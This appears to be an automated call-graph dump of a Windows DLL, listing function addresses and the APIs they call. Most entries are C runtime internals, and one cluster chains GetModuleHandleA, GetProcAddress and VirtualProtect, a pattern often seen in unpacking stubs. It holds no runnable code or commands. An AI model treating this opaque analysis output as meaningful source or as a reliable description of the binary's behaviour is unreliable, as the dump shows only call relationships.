WideCharToMultiByte 6869->6870 6870->6865 6871 10008a35 6870->6871 6872 10008801 __freea 20 API calls 6871->6872 6872->6854 6874 10005c45 _free 5 API calls 6873->6874 6875 10005f40 6874->6875 6878 10005f49 6875->6878 6881 10005fa1 6875->6881 6879 10002ada _ValidateLocalCookies 5 API calls 6878->6879 6880 10005f9b 6879->6880 6880->6854 6880->6861 6880->6862 6882 10005c45 _free 5 API calls 6881->6882 6883 10005fc8 6882->6883 6884 10002ada _ValidateLocalCookies 5 API calls 6883->6884 6885 10005f89 LCMapStringW 6884->6885 6885->6878 6887 10006892 ___scrt_is_nonwritable_in_current_image 6886->6887 6894 10005671 RtlEnterCriticalSection 6887->6894 6889 1000689c 6895 100068f1 6889->6895 6893 100068b5 _abort 6893->6812 6894->6889 6907 10007011 6895->6907 6897 1000693f 6898 10007011 26 API calls 6897->6898 6899 1000695b 6898->6899 6900 10007011 26 API calls 6899->6900 6901 10006979 6900->6901 6902 100068a9 6901->6902 6903 1000571e _free 20 API calls 6901->6903 6904 100068bd 6902->6904 6903->6902 6921 100056b9 RtlLeaveCriticalSection 6904->6921 6906 100068c7 6906->6893 6908 10007022 6907->6908 6917 1000701e 6907->6917 6909 10007029 6908->6909 6913 1000703c ___scrt_fastfail 6908->6913 6910 10006368 _free 20 API calls 6909->6910 6911 1000702e 6910->6911 6912 100062ac _abort 26 API calls 6911->6912 6912->6917 6914 10007073 6913->6914 6915 1000706a 6913->6915 6913->6917 6914->6917 6919 10006368 _free 20 API calls 6914->6919 6916 10006368 _free 20 API calls 6915->6916 6918 1000706f 6916->6918 6917->6897 6920 100062ac _abort 26 API calls 6918->6920 6919->6918 6920->6917 6921->6906 6922 1000508a 6923 100050a2 6922->6923 6924 1000509c 6922->6924 6925 10005000 20 API calls 6924->6925 6925->6923 6021 1000220c 6022 10002215 6021->6022 6023 1000221a dllmain_dispatch 6021->6023 6025 100022b1 6022->6025 6026 100022c7 6025->6026 6028 100022d0 6026->6028 6029 10002264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6026->6029 6028->6023 6029->6028 6926 10003c90 RtlUnwind 6030 10002418 6031 10002420 ___scrt_release_startup_lock 6030->6031 6034 100047f5 6031->6034 6033 10002448 6035 10004804 6034->6035 6036 10004808 6034->6036 6035->6033 6039 10004815 6036->6039 6040 10005b7a _free 20 API calls 6039->6040 6043 1000482c 6040->6043 6041 10002ada _ValidateLocalCookies 5 API calls 6042 10004811 6041->6042 6042->6033 6043->6041 6927 10004a9a 6930 10005411 6927->6930 6931 1000541d _abort 6930->6931 6932 10005af6 _abort 38 API calls 6931->6932 6935 10005422 6932->6935 6933 100055a8 _abort 38 API calls 6934 1000544c 6933->6934 6935->6933 7579 1000679a 7580 100067a4 7579->7580 7581 100067b4 7580->7581 7583 1000571e _free 20 API calls 7580->7583 7582 1000571e _free 20 API calls 7581->7582 7584 100067bb 7582->7584 7583->7580 6044 1000281c 6047 10002882 6044->6047 6050 10003550 6047->6050 6049 1000282a 6051 1000355d 6050->6051 6054 1000358a 6050->6054 6052 100047e5 ___std_exception_copy 21 API calls 6051->6052 6051->6054 6053 1000357a 6052->6053 6053->6054 6056 1000544d 6053->6056 6054->6049 6057 1000545a 6056->6057 6058 10005468 6056->6058 6057->6058 6063 1000547f 6057->6063 6059 10006368 _free 20 API calls 6058->6059 6060 10005470 6059->6060 6065 100062ac 6060->6065 6062 1000547a 6062->6054 6063->6062 6064 10006368 _free 20 API calls 6063->6064 6064->6060 6068 10006231 6065->6068 6067 100062b8 6067->6062 6069 10005b7a _free 20 API calls 6068->6069 6070 10006247 6069->6070 6071 100062a6 6070->6071 6075 10006255 6070->6075 6079 100062bc IsProcessorFeaturePresent 6071->6079 6073 100062ab 6074 10006231 _abort 26 API calls 6073->6074 6076 100062b8 6074->6076 6077 10002ada _ValidateLocalCookies 5 API calls 6075->6077 6076->6067 6078 1000627c 6077->6078 6078->6067 6080 100062c7 6079->6080 6083 100060e2 6080->6083 6084 100060fe ___scrt_fastfail 6083->6084 6085 1000612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6084->6085 6087 100061fb ___scrt_fastfail 6085->6087 6086 10002ada _ValidateLocalCookies 5 API calls 6088 10006219 GetCurrentProcess TerminateProcess 6086->6088 6087->6086 6088->6073 7588 100021a1 ___scrt_dllmain_exception_filter 6089 10009c23 6090 10009c56 6089->6090 6091 10009c28 6089->6091 6127 10009728 6090->6127 6092 10009c46 6091->6092 6093 10009c2d 6091->6093 6119 100098f5 6092->6119 6095 10009ccd 6093->6095 6112 10009807 6093->6112 6098 10006368 _free 20 API calls 6095->6098 6103 10009cc0 6095->6103 6100 10009cf2 6098->6100 6099 10009bf2 6099->6095 6102 10009ca9 6099->6102 6099->6103 6101 10006355 __dosmaperr 20 API calls 6100->6101 6101->6103 6105 10009cb0 6102->6105 6106 10009cc4 6102->6106 6104 10002ada _ValidateLocalCookies 5 API calls 6103->6104 6107 10009d15 6104->6107 6109 10006368 _free 20 API calls 6105->6109 6137 10006332 6106->6137 6110 10009cb5 6109->6110 6134 10006355 6110->6134 6114 10009816 6112->6114 6113 100098d8 6116 10002ada _ValidateLocalCookies 5 API calls 6113->6116 6114->6113 6115 10009894 WriteFile 6114->6115 6115->6114 6117 100098da GetLastError 6115->6117 6118 100098f1 6116->6118 6117->6113 6118->6099 6120 10009904 6119->6120 6121 10009a0f 6120->6121 6124 10009986 WideCharToMultiByte 6120->6124 6126 100099bb WriteFile 6120->6126 6122 10002ada _ValidateLocalCookies 5 API calls 6121->6122 6123 10009a1e 6122->6123 6123->6099 6125 10009a07 GetLastError 6124->6125 6124->6126 6125->6121 6126->6120 6126->6125 6132 10009737 6127->6132 6128 100097ea 6129 10002ada _ValidateLocalCookies 5 API calls 6128->6129 6131 10009803 6129->6131 6130 100097a9 WriteFile 6130->6132 6133 100097ec GetLastError 6130->6133 6131->6099 6132->6128 6132->6130 6133->6128 6135 10005b7a _free 20 API calls 6134->6135 6136 1000635a 6135->6136 6136->6103 6138 10006355 __dosmaperr 20 API calls 6137->6138 6139 1000633d _free 6138->6139 6140 10006368 _free 20 API calls 6139->6140 6141 10006350 6140->6141 6141->6103 5763 1000c7a7 5764 1000c7be 5763->5764 5770 1000c82c 5763->5770 5764->5770 5775 1000c7e6 GetModuleHandleA 5764->5775 5766 1000c835 GetModuleHandleA 5769 1000c83f 5766->5769 5767 1000c872 5768 1000c7dd 5768->5769 5768->5770 5772 1000c800 GetProcAddress 5768->5772 5769->5770 5771 1000c85f GetProcAddress 5769->5771 5770->5766 5770->5767 5770->5769 5771->5770 5772->5770 5773 1000c80d VirtualProtect 5772->5773 5773->5770 5774 1000c81c VirtualProtect 5773->5774 5774->5770 5776 1000c82c 5775->5776 5777 1000c7ef 5775->5777 5780 1000c872 5776->5780 5781 1000c835 GetModuleHandleA 5776->5781 5785 1000c83f 5776->5785 5787 1000c803 GetProcAddress 5777->5787 5779 1000c7f4 5779->5776 5782 1000c800 GetProcAddress 5779->5782 5781->5785 5782->5776 5783 1000c80d VirtualProtect 5782->5783 5783->5776 5784 1000c81c VirtualProtect 5783->5784 5784->5776 5785->5776 5786 1000c85f GetProcAddress 5785->5786 5786->5776 5788 1000c82c 5787->5788 5789 1000c80d VirtualProtect 5787->5789 5791 1000c872 5788->5791 5792 1000c835 GetModuleHandleA 5788->5792 5789->5788 5790 1000c81c VirtualProtect 5789->5790 5790->5788 5794 1000c83f 5792->5794 5793 1000c85f GetProcAddress 5793->5794 5794->5788 5794->5793 7589 10009fa7 7590 10006368 _free 20 API calls 7589->7590 7591 10009fac 7590->7591 6142 1000742b 6143 10007430 6142->6143 6144 10007453 6143->6144 6146 10008bae 6143->6146 6147 10008bdd 6146->6147 6148 10008bbb 6146->6148 6147->6143 6149 10008bd7 6148->6149 6150 10008bc9 RtlDeleteCriticalSection 6148->6150 6151 1000571e _free 20 API calls 6149->6151 6150->6149 6150->6150 6151->6147 6936 100060ac 6937 100060dd 6936->6937 6939 100060b7 6936->6939 6938 100060c7 FreeLibrary 6938->6939 6939->6937 6939->6938 6940 1000aeac 6941 1000aeb5 6940->6941 6942 10008cc1 21 API calls 6941->6942 6943 1000aebb 6942->6943 6944 10006332 __dosmaperr 20 API calls 6943->6944 6945 1000aedd 6943->6945 6944->6945 6152 10005630 6153 1000563b 6152->6153 6155 10005664 6153->6155 6156 10005660 6153->6156 6158 10005eb7 6153->6158 6165 10005688 6155->6165 6159 10005c45 _free 5 API calls 6158->6159 6160 10005ede 6159->6160 6161 10005efc InitializeCriticalSectionAndSpinCount 6160->6161 6162 10005ee7 6160->6162 6161->6162 6163 10002ada _ValidateLocalCookies 5 API calls 6162->6163 6164 10005f13 6163->6164 6164->6153 6166 10005695 6165->6166 6168 100056b4 6165->6168 6167 1000569f RtlDeleteCriticalSection 6166->6167 6167->6167 6167->6168 6168->6156 6950 100096b2 6957 10008dbc 6950->6957 6952 100096c7 6953 100096c2 6953->6952 6954 10005af6 _abort 38 API calls 6953->6954 6955 100096ea 6954->6955 6955->6952 6956 10009708 GetConsoleMode 6955->6956 6956->6952 6958 10008dc9 6957->6958 6960 10008dd6 6957->6960 6959 10006368 _free 20 API calls 6958->6959 6962 10008dce 6959->6962 6961 10006368 _free 20 API calls 6960->6961 6963 10008de2 6960->6963 6964 10008e03 6961->6964 6962->6953 6963->6953 6965 100062ac _abort 26 API calls 6964->6965 6965->6962 6966 10003eb3 6967 10005411 38 API calls 6966->6967 6968 10003ebb 6967->6968 7192 10008b34 7193 1000637b _free 20 API calls 7192->7193 7194 10008b46 7193->7194 7196 10005eb7 11 API calls 7194->7196 7198 10008b53 7194->7198 7195 1000571e _free 20 API calls 7197 10008ba5 7195->7197 7196->7194 7198->7195 7199 10009b3c 7200 10006355 __dosmaperr 20 API calls 7199->7200 7201 10009b44 7200->7201 7202 10006368 _free 20 API calls 7201->7202 7203 10009b4b 7202->7203 7204 100062ac _abort 26 API calls 7203->7204 7205 10009b56 7204->7205 7206 10002ada _ValidateLocalCookies 5 API calls 7205->7206 7207 10009d15 7206->7207 6169 1000543d 6170 10005440 6169->6170 6173 100055a8 6170->6173 6184 10007613 6173->6184 6177 100055c2 IsProcessorFeaturePresent 6181 100055cd 6177->6181 6178 100055e0 6214 10004bc1 6178->6214 6180 100055b8 6180->6177 6180->6178 6183 100060e2 _abort 8 API calls 6181->6183 6183->6178 6217 10007581 6184->6217 6187 1000766e 6188 1000767a _abort 6187->6188 6189 10005b7a _free 20 API calls 6188->6189 6193 100076a7 _abort 6188->6193 6194 100076a1 _abort 6188->6194 6189->6194 6190 100076f3 6191 10006368 _free 20 API calls 6190->6191 6192 100076f8 6191->6192 6195 100062ac _abort 26 API calls 6192->6195 6199 1000771f 6193->6199 6231 10005671 RtlEnterCriticalSection 6193->6231 6194->6190 6194->6193 6213 100076d6 6194->6213 6195->6213 6200 1000777e 6199->6200 6202 10007776 6199->6202 6210 100077a9 6199->6210 6232 100056b9 RtlLeaveCriticalSection 6199->6232 6200->6210 6233 10007665 6200->6233 6205 10004bc1 _abort 28 API calls 6202->6205 6205->6200 6209 10007665 _abort 38 API calls 6209->6210 6236 1000782e 6210->6236 6211 1000780c 6212 10005af6 _abort 38 API calls 6211->6212 6211->6213 6212->6213 6260 1000bdc9 6213->6260 6264 1000499b 6214->6264 6220 10007527 6217->6220 6219 100055ad 6219->6180 6219->6187 6221 10007533 ___scrt_is_nonwritable_in_current_image 6220->6221 6226 10005671 RtlEnterCriticalSection 6221->6226 6223 10007541 6227 10007575 6223->6227 6225 10007568 _abort 6225->6219 6226->6223 6230 100056b9 RtlLeaveCriticalSection 6227->6230 6229 1000757f 6229->6225 6230->6229 6231->6199 6232->6202 6234 10005af6 _abort 38 API calls 6233->6234 6235 1000766a 6234->6235 6235->6209 6237 10007834 6236->6237 6239 100077fd 6236->6239 6263 100056b9 RtlLeaveCriticalSection 6237->6263 6239->6211 6239->6213 6240 10005af6 GetLastError 6239->6240 6241 10005b12 6240->6241 6242 10005b0c 6240->6242 6243 1000637b _free 20 API calls 6241->6243 6246 10005b61 SetLastError 6241->6246 6244 10005e08 _free 11 API calls 6242->6244 6245 10005b24 6243->6245 6244->6241 6247 10005b2c 6245->6247 6248 10005e5e _free 11 API calls 6245->6248 6246->6211 6249 1000571e _free 20 API calls 6247->6249 6250 10005b41 6248->6250 6251 10005b32 6249->6251 6250->6247 6252 10005b48 6250->6252 6253 10005b6d SetLastError 6251->6253 6254 1000593c _free 20 API calls 6252->6254 6255 100055a8 _abort 35 API calls 6253->6255 6256 10005b53 6254->6256 6257 10005b79 6255->6257 6258 1000571e _free 20 API calls 6256->6258 6259 10005b5a 6258->6259 6259->6246 6259->6253 6261 10002ada _ValidateLocalCookies 5 API calls 6260->6261 6262 1000bdd4 6261->6262 6262->6262 6263->6239 6265 100049a7 _abort 6264->6265 6266 100049bf 6265->6266 6286 10004af5 GetModuleHandleW 6265->6286 6295 10005671 RtlEnterCriticalSection 6266->6295 6270 10004a65 6303 10004aa5 6270->6303 6274 10004a3c 6275 10004a54 6274->6275 6299 10004669 6274->6299 6281 10004669 _abort 5 API calls 6275->6281 6276 100049c7 6276->6270 6276->6274 6296 1000527a 6276->6296 6277 10004a82 6306 10004ab4 6277->6306 6278 10004aae 6279 1000bdc9 _abort 5 API calls 6278->6279 6284 10004ab3 6279->6284 6281->6270 6287 100049b3 6286->6287 6287->6266 6288 10004b39 GetModuleHandleExW 6287->6288 6289 10004b63 GetProcAddress 6288->6289 6290 10004b78 6288->6290 6289->6290 6291 10004b95 6290->6291 6292 10004b8c FreeLibrary 6290->6292 6293 10002ada _ValidateLocalCookies 5 API calls 6291->6293 6292->6291 6294 10004b9f 6293->6294 6294->6266 6295->6276 6314 10005132 6296->6314 6300 10004698 6299->6300 6301 10002ada _ValidateLocalCookies 5 API calls 6300->6301 6302 100046c1 6301->6302 6302->6275 6336 100056b9 RtlLeaveCriticalSection 6303->6336 6305 10004a7e 6305->6277 6305->6278 6337 10006025 6306->6337 6309 10004ae2 6312 10004b39 _abort 8 API calls 6309->6312 6310 10004ac2 GetPEB 6310->6309 6311 10004ad2 GetCurrentProcess TerminateProcess 6310->6311 6311->6309 6313 10004aea ExitProcess 6312->6313 6317 100050e1 6314->6317 6316 10005156 6316->6274 6318 100050ed ___scrt_is_nonwritable_in_current_image 6317->6318 6325 10005671 RtlEnterCriticalSection 6318->6325 6320 100050fb 6326 1000515a 6320->6326 6324 10005119 _abort 6324->6316 6325->6320 6327 1000517a 6326->6327 6330 10005182 6326->6330 6328 10002ada _ValidateLocalCookies 5 API calls 6327->6328 6329 10005108 6328->6329 6332 10005126 6329->6332 6330->6327 6331 1000571e _free 20 API calls 6330->6331 6331->6327 6335 100056b9 RtlLeaveCriticalSection 6332->6335 6334 10005130 6334->6324 6335->6334 6336->6305 6338 1000604a 6337->6338 6342 10006040 6337->6342 6339 10005c45 _free 5 API calls 6338->6339 6339->6342 6340 10002ada _ValidateLocalCookies 5 API calls 6341 10004abe 6340->6341 6341->6309 6341->6310 6342->6340 7208 10001f3f 7209 10001f4b ___scrt_is_nonwritable_in_current_image 7208->7209 7226 1000247c 7209->7226 7211 10001f52 7212 10002041 7211->7212 7213 10001f7c 7211->7213 7225 10001f57 ___scrt_is_nonwritable_in_current_image 7211->7225 7215 10002639 ___scrt_fastfail 4 API calls 7212->7215 7237 100023de 7213->7237 7216 10002048 7215->7216 7217 10001f8b __RTC_Initialize 7217->7225 7240 100022fc RtlInitializeSListHead 7217->7240 7219 10001f99 ___scrt_initialize_default_local_stdio_options 7241 100046c5 7219->7241 7223 10001fb8 7224 10004669 _abort 5 API calls 7223->7224 7223->7225 7224->7225 7227 10002485 7226->7227 7249 10002933 IsProcessorFeaturePresent 7227->7249 7231 10002496 7232 1000249a 7231->7232 7260 100053c8 7231->7260 7232->7211 7235 100024b1 7235->7211 7236 10003529 ___vcrt_uninitialize 8 API calls 7236->7232 7291 100024b5 7237->7291 7239 100023e5 7239->7217 7240->7219 7243 100046dc 7241->7243 7242 10002ada _ValidateLocalCookies 5 API calls 7244 10001fad 7242->7244 7243->7242 7244->7225 7245 100023b3 7244->7245 7246 100023b8 ___scrt_release_startup_lock 7245->7246 7247 10002933 ___isa_available_init IsProcessorFeaturePresent 7246->7247 7248 100023c1 7246->7248 7247->7248 7248->7223 7250 10002491 7249->7250 7251 100034ea 7250->7251 7252 100034ef ___vcrt_initialize_winapi_thunks 7251->7252 7263 10003936 7252->7263 7255 100034fd 7255->7231 7257 10003505 7258 10003510 7257->7258 7259 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7257->7259 7258->7231 7259->7255 7287 10007457 7260->7287 7264 1000393f 7263->7264 7266 10003968 7264->7266 7267 100034f9 7264->7267 7277 10003be0 7264->7277 7268 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7266->7268 7267->7255 7269 100038e8 7267->7269 7268->7267 7282 10003af1 7269->7282 7272 100038fd 7272->7257 7273 10003ba2 ___vcrt_FlsSetValue 6 API calls 7274 1000390b 7273->7274 7275 10003918 7274->7275 7276 1000391b ___vcrt_uninitialize_ptd 6 API calls 7274->7276 7275->7257 7276->7272 7278 10003a82 try_get_function 5 API calls 7277->7278 7279 10003bfa 7278->7279 7280 10003c18 InitializeCriticalSectionAndSpinCount 7279->7280 7281 10003c03 7279->7281 7280->7281 7281->7264 7283 10003a82 try_get_function 5 API calls 7282->7283 7284 10003b0b 7283->7284 7285 10003b24 TlsAlloc 7284->7285 7286 100038f2 7284->7286 7286->7272 7286->7273 7290 10007470 7287->7290 7288 10002ada _ValidateLocalCookies 5 API calls 7289 100024a3 7288->7289 7289->7235 7289->7236 7290->7288 7292 100024c4 7291->7292 7293 100024c8 7291->7293 7292->7239 7294 10002639 ___scrt_fastfail 4 API calls 7293->7294 7296 100024d5 ___scrt_release_startup_lock 7293->7296 7295 10002559 7294->7295 7296->7239 6343 10008640 6346 10008657 6343->6346 6347 10008665 6346->6347 6348 10008679 6346->6348 6351 10006368 _free 20 API calls 6347->6351 6349 10008681 6348->6349 6350 10008693 6348->6350 6352 10006368 _free 20 API calls 6349->6352 6358 10008652 6350->6358 6359 100054a7 6350->6359 6353 1000866a 6351->6353 6354 10008686 6352->6354 6356 100062ac _abort 26 API calls 6353->6356 6357 100062ac _abort 26 API calls 6354->6357 6356->6358 6357->6358 6360 100054c4 6359->6360 6361 100054ba 6359->6361 6360->6361 6362 10005af6 _abort 38 API calls 6360->6362 6361->6358 6363 100054e5 6362->6363 6367 10007a00 6363->6367 6368 10007a13 6367->6368 6369 100054fe 6367->6369 6368->6369 6375 10007f0f 6368->6375 6371 10007a2d 6369->6371 6372 10007a40 6371->6372 6373 10007a55 6371->6373 6372->6373 6510 10006d7e 6372->6510 6373->6361 6376 10007f1b ___scrt_is_nonwritable_in_current_image 6375->6376 6377 10005af6 _abort 38 API calls 6376->6377 6378 10007f24 6377->6378 6379 10007f72 _abort 6378->6379 6387 10005671 RtlEnterCriticalSection 6378->6387 6379->6369 6381 10007f42 6388 10007f86 6381->6388 6386 100055a8 _abort 38 API calls 6386->6379 6387->6381 6389 10007f56 6388->6389 6390 10007f94 _free 6388->6390 6392 10007f75 6389->6392 6390->6389 6395 10007cc2 6390->6395 6509 100056b9 RtlLeaveCriticalSection 6392->6509 6394 10007f69 6394->6379 6394->6386 6396 10007d42 6395->6396 6399 10007cd8 6395->6399 6397 10007d90 6396->6397 6400 1000571e _free 20 API calls 6396->6400 6463 10007e35 6397->6463 6399->6396 6401 10007d0b 6399->6401 6406 1000571e _free 20 API calls 6399->6406 6402 10007d64 6400->6402 6403 10007d2d 6401->6403 6412 1000571e _free 20 API calls 6401->6412 6404 1000571e _free 20 API calls 6402->6404 6405 1000571e _free 20 API calls 6403->6405 6407 10007d77 6404->6407 6409 10007d37 6405->6409 6411 10007d00 6406->6411 6413 1000571e _free 20 API calls 6407->6413 6408 10007d9e 6410 10007dfe 6408->6410 6422 1000571e 20 API calls _free 6408->6422 6414 1000571e _free 20 API calls 6409->6414 6415 1000571e _free 20 API calls 6410->6415 6423 100090ba 6411->6423 6417 10007d22 6412->6417 6418 10007d85 6413->6418 6414->6396 6421 10007e04 6415->6421 6451 100091b8 6417->6451 6420 1000571e _free 20 API calls 6418->6420 6420->6397 6421->6389 6422->6408 6424 100090cb 6423->6424 6450 100091b4 6423->6450 6425 100090dc 6424->6425 6426 1000571e _free 20 API calls 6424->6426 6427 100090ee 6425->6427 6428 1000571e _free 20 API calls 6425->6428 6426->6425 6429 10009100 6427->6429 6431 1000571e _free 20 API calls 6427->6431 6428->6427 6430 10009112 6429->6430 6432 1000571e _free 20 API calls 6429->6432 6433 10009124 6430->6433 6434 1000571e _free 20 API calls 6430->6434 6431->6429 6432->6430 6435 10009136 6433->6435 6436 1000571e _free 20 API calls 6433->6436 6434->6433 6437 10009148 6435->6437 6438 1000571e _free 20 API calls 6435->6438 6436->6435 6439 1000571e _free 20 API calls 6437->6439 6440 1000915a 6437->6440 6438->6437 6439->6440 6441 1000916c 6440->6441 6442 1000571e _free 20 API calls 6440->6442 6443 1000917e 6441->6443 6444 1000571e _free 20 API calls 6441->6444 6442->6441 6445 10009190 6443->6445 6447 1000571e _free 20 API calls 6443->6447 6444->6443 6446 100091a2 6445->6446 6448 1000571e _free 20 API calls 6445->6448 6449 1000571e _free 20 API calls 6446->6449 6446->6450 6447->6445 6448->6446 6449->6450 6450->6401 6452 100091c5 6451->6452 6462 1000921d 6451->6462 6453 100091d5 6452->6453 6454 1000571e _free 20 API calls 6452->6454 6455 100091e7 6453->6455 6456 1000571e _free 20 API calls 6453->6456 6454->6453 6457 1000571e _free 20 API calls 6455->6457 6458 100091f9 6455->6458 6456->6455 6457->6458 6459 1000920b 6458->6459 6460 1000571e _free 20 API calls 6458->6460 6461 1000571e _free 20 API calls 6459->6461 6459->6462 6460->6459 6461->6462 6462->6403 6464 10007e60 6463->6464 6465 10007e42 6463->6465 6464->6408 6465->6464 6469 1000925d 6465->6469 6468 1000571e _free 20 API calls 6468->6464 6470 10007e5a 6469->6470 6471 1000926e 6469->6471 6470->6468 6505 10009221 6471->6505 6474 10009221 _free 20 API calls 6475 10009281 6474->6475 6476 10009221 _free 20 API calls 6475->6476 6477 1000928c 6476->6477 6478 10009221 _free 20 API calls 6477->6478 6479 10009297 6478->6479 6480 10009221 _free 20 API calls 6479->6480 6481 100092a5 6480->6481 6482 1000571e _free 20 API calls 6481->6482 6483 100092b0 6482->6483 6484 1000571e _free 20 API calls 6483->6484 6485 100092bb 6484->6485 6486 1000571e _free 20 API calls 6485->6486 6487 100092c6 6486->6487 6488 10009221 _free 20 API calls 6487->6488 6489 100092d4 6488->6489 6490 10009221 _free 20 API calls 6489->6490 6491 100092e2 6490->6491 6492 10009221 _free 20 API calls 6491->6492 6493 100092f3 6492->6493 6494 10009221 _free 20 API calls 6493->6494 6495 10009301 6494->6495 6496 10009221 _free 20 API calls 6495->6496 6497 1000930f 6496->6497 6498 1000571e _free 20 API calls 6497->6498 6499 1000931a 6498->6499 6500 1000571e _free 20 API calls 6499->6500 6501 10009325 6500->6501 6502 1000571e _free 20 API calls 6501->6502 6503 10009330 6502->6503 6504 1000571e _free 20 API calls 6503->6504 6504->6470 6506 10009258 6505->6506 6507 10009248 6505->6507 6506->6474 6507->6506 6508 1000571e _free 20 API calls 6507->6508 6508->6507 6509->6394 6511 10006d8a ___scrt_is_nonwritable_in_current_image 6510->6511 6512 10005af6 _abort 38 API calls 6511->6512 6517 10006d94 6512->6517 6514 10006e18 _abort 6514->6373 6516 100055a8 _abort 38 API calls 6516->6517 6517->6514 6517->6516 6518 1000571e _free 20 API calls 6517->6518 6519 10005671 RtlEnterCriticalSection 6517->6519 6520 10006e0f 6517->6520 6518->6517 6519->6517 6523 100056b9 RtlLeaveCriticalSection 6520->6523 6522 10006e16 6522->6517 6523->6522 7297 1000af43 7298 1000af59 7297->7298 7299 1000af4d 7297->7299 7299->7298 7300 1000af52 CloseHandle 7299->7300 7300->7298 7301 1000a945 7303 1000a96d 7301->7303 7302 1000a9a5 7303->7302 7304 1000a997 7303->7304 7305 1000a99e 7303->7305 7310 1000aa17 7304->7310 7314 1000aa00 7305->7314 7311 1000aa20 7310->7311 7318 1000b19b 7311->7318 7315 1000aa20 7314->7315 7316 1000b19b __startOneArgErrorHandling 21 API calls 7315->7316 7317 1000a9a3 7316->7317 7319 1000b1da __startOneArgErrorHandling 7318->7319 7324 1000b25c __startOneArgErrorHandling 7319->7324 7328 1000b59e 7319->7328 7321 1000b286 7322 1000b8b2 __startOneArgErrorHandling 20 API calls 7321->7322 7323 1000b292 7321->7323 7322->7323 7326 10002ada _ValidateLocalCookies 5 API calls 7323->7326 7324->7321 7325 100078a3 __startOneArgErrorHandling 5 API calls 7324->7325 7325->7321 7327 1000a99c 7326->7327 7329 1000b5c1 __raise_exc RaiseException 7328->7329 7330 1000b5bc 7329->7330 7330->7324 7592 1000a1c6 IsProcessorFeaturePresent 7593 10007bc7 7594 10007bd3 ___scrt_is_nonwritable_in_current_image 7593->7594 7595 10007c0a _abort 7594->7595 7601 10005671 RtlEnterCriticalSection 7594->7601 7597 10007be7 7598 10007f86 20 API calls 7597->7598 7599 10007bf7 7598->7599 7602 10007c10 7599->7602 7601->7597 7605 100056b9 RtlLeaveCriticalSection 7602->7605 7604 10007c17 7604->7595 7605->7604 7331 10005348 7332 10003529 ___vcrt_uninitialize 8 API calls 7331->7332 7333 1000534f 7332->7333 7334 10007b48 7344 10008ebf 7334->7344 7338 10007b55 7357 1000907c 7338->7357 7341 10007b7f 7342 1000571e _free 20 API calls 7341->7342 7343 10007b8a 7342->7343 7361 10008ec8 7344->7361 7346 10007b50 7347 10008fdc 7346->7347 7348 10008fe8 ___scrt_is_nonwritable_in_current_image 7347->7348 7381 10005671 RtlEnterCriticalSection 7348->7381 7350 1000905e 7395 10009073 7350->7395 7351 10008ff3 7351->7350 7353 10009032 RtlDeleteCriticalSection 7351->7353 7382 1000a09c 7351->7382 7356 1000571e _free 20 API calls 7353->7356 7354 1000906a _abort 7354->7338 7356->7351 7358 10007b64 RtlDeleteCriticalSection 7357->7358 7359 10009092 7357->7359 7358->7338 7358->7341 7359->7358 7360 1000571e _free 20 API calls 7359->7360 7360->7358 7362 10008ed4 ___scrt_is_nonwritable_in_current_image 7361->7362 7371 10005671 RtlEnterCriticalSection 7362->7371 7364 10008f77 7376 10008f97 7364->7376 7368 10008f83 _abort 7368->7346 7369 10008e78 30 API calls 7370 10008ee3 7369->7370 7370->7364 7370->7369 7372 10007b94 RtlEnterCriticalSection 7370->7372 7373 10008f6d 7370->7373 7371->7370 7372->7370 7379 10007ba8 RtlLeaveCriticalSection 7373->7379 7375 10008f75 7375->7370 7380 100056b9 RtlLeaveCriticalSection 7376->7380 7378 10008f9e 7378->7368 7379->7375 7380->7378 7381->7351 7383 1000a0a8 ___scrt_is_nonwritable_in_current_image 7382->7383 7384 1000a0b9 7383->7384 7385 1000a0ce 7383->7385 7386 10006368 _free 20 API calls 7384->7386 7394 1000a0c9 _abort 7385->7394 7398 10007b94 RtlEnterCriticalSection 7385->7398 7388 1000a0be 7386->7388 7390 100062ac _abort 26 API calls 7388->7390 7389 1000a0ea 7399 1000a026 7389->7399 7390->7394 7392 1000a0f5 7415 1000a112 7392->7415 7394->7351 7490 100056b9 RtlLeaveCriticalSection 7395->7490 7397 1000907a 7397->7354 7398->7389 7400 1000a033 7399->7400 7401 1000a048 7399->7401 7402 10006368 _free 20 API calls 7400->7402 7407 1000a043 7401->7407 7418 10008e12 7401->7418 7403 1000a038 7402->7403 7405 100062ac _abort 26 API calls 7403->7405 7405->7407 7407->7392 7408 1000907c 20 API calls 7409 1000a064 7408->7409 7424 10007a5a 7409->7424 7411 1000a06a 7431 1000adce 7411->7431 7414 1000571e _free 20 API calls 7414->7407 7489 10007ba8 RtlLeaveCriticalSection 7415->7489 7417 1000a11a 7417->7394 7419 10008e26 7418->7419 7420 10008e2a 7418->7420 7419->7408 7420->7419 7421 10007a5a 26 API calls 7420->7421 7422 10008e4a 7421->7422 7446 10009a22 7422->7446 7425 10007a66 7424->7425 7426 10007a7b 7424->7426 7427 10006368 _free 20 API calls 7425->7427 7426->7411 7428 10007a6b 7427->7428 7429 100062ac _abort 26 API calls 7428->7429 7430 10007a76 7429->7430 7430->7411 7432 1000adf2 7431->7432 7433 1000addd 7431->7433 7434 1000ae2d 7432->7434 7438 1000ae19 7432->7438 7435 10006355 __dosmaperr 20 API calls 7433->7435 7436 10006355 __dosmaperr 20 API calls 7434->7436 7437 1000ade2 7435->7437 7439 1000ae32 7436->7439 7440 10006368 _free 20 API calls 7437->7440 7473 1000ada6 7438->7473 7442 10006368 _free 20 API calls 7439->7442 7443 1000a070 7440->7443 7444 1000ae3a 7442->7444 7443->7407 7443->7414 7445 100062ac _abort 26 API calls 7444->7445 7445->7443 7447 10009a2e ___scrt_is_nonwritable_in_current_image 7446->7447 7448 10009a36 7447->7448 7449 10009a4e 7447->7449 7450 10006355 __dosmaperr 20 API calls 7448->7450 7451 10009aec 7449->7451 7454 10009a83 7449->7454 7453 10009a3b 7450->7453 7452 10006355 __dosmaperr 20 API calls 7451->7452 7455 10009af1 7452->7455 7456 10006368 _free 20 API calls 7453->7456 7468 10008c7b RtlEnterCriticalSection 7454->7468 7458 10006368 _free 20 API calls 7455->7458 7463 10009a43 _abort 7456->7463 7460 10009af9 7458->7460 7459 10009a89 7462 10006368 _free 20 API calls 7459->7462 7466 10009ab5 7459->7466 7461 100062ac _abort 26 API calls 7460->7461 7461->7463 7464 10009aaa 7462->7464 7463->7419 7465 10006355 